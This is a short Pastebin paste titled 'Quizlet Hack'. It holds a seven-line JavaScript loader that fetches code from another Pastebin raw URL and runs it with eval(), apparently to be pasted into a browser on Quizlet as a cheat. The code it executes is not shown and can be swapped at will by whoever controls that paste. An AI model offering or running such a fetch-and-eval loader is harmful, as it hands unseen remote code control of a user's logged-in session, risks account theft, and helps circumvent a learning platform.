asteroidsteam

Quizlet Hack

Feb 8th, 2019
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. fetch("https://pastebin.com/raw/405DQ6Vk")
  2.   .then(function(response) {
  3.     response.text().then(function(text) {
  4.       eval(text);
  5.       done();
  6.     });
  7.   });
Add Comment
Please, Sign In to add comment